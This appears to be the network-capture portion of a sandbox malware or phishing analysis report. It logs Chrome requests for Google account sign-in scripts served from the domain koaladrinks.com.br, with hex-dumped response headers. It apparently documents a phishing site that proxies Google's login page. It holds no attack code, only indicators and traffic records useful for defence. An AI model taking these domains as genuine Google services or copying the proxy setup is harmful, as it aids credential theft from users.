                                                      2025-01-10 08:27:49 UTC2337OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc; [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:49 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:49 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:49 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 30 0d 0a
                                                      Data Ascii: Age: 22930
                                                      2025-01-10 08:27:49 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:49 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:49 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:49 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:49 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:49 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:49 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 33 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:39 GMT
                                                      2025-01-10 08:27:49 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 33 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:39 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.949768139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:49 UTC1568OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,pxq3x,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddg [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:49 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:49 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:49 UTC8INData Raw: 41 67 65 3a 20 34 0d 0a
                                                      Data Ascii: Age: 4
                                                      2025-01-10 08:27:49 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:49 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:49 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:49 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:49 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:49 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:49 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:45 GMT
                                                      2025-01-10 08:27:49 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 37 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:27:45 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.949770139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:49 UTC2344OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;M [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:50 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:50 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:50 UTC12INData Raw: 41 67 65 3a 20 32 32 39 32 39 0d 0a
                                                      Data Ascii: Age: 22929
                                                      2025-01-10 08:27:50 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:50 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:50 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:50 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:50 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:50 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:50 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 34 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:40 GMT
                                                      2025-01-10 08:27:50 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 34 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:40 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.949772139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:50 UTC1715OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:50 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:50 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:50 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:50 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:50 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:50 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:50 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:50 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:50 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:50 GMT
                                                      2025-01-10 08:27:50 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 37 3a 35 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:27:50 GMT
                                                      2025-01-10 08:27:50 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 35 39 3a 32 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Last-Modified: Fri, 03 Jan 2025 23:59:22 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.949774139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:50 UTC1831OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NwH0H,OTA3Ae,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NL [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:50 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:50 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:50 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 32 0d 0a
                                                      Data Ascii: Age: 22932
                                                      2025-01-10 08:27:50 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:50 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:50 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:50 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
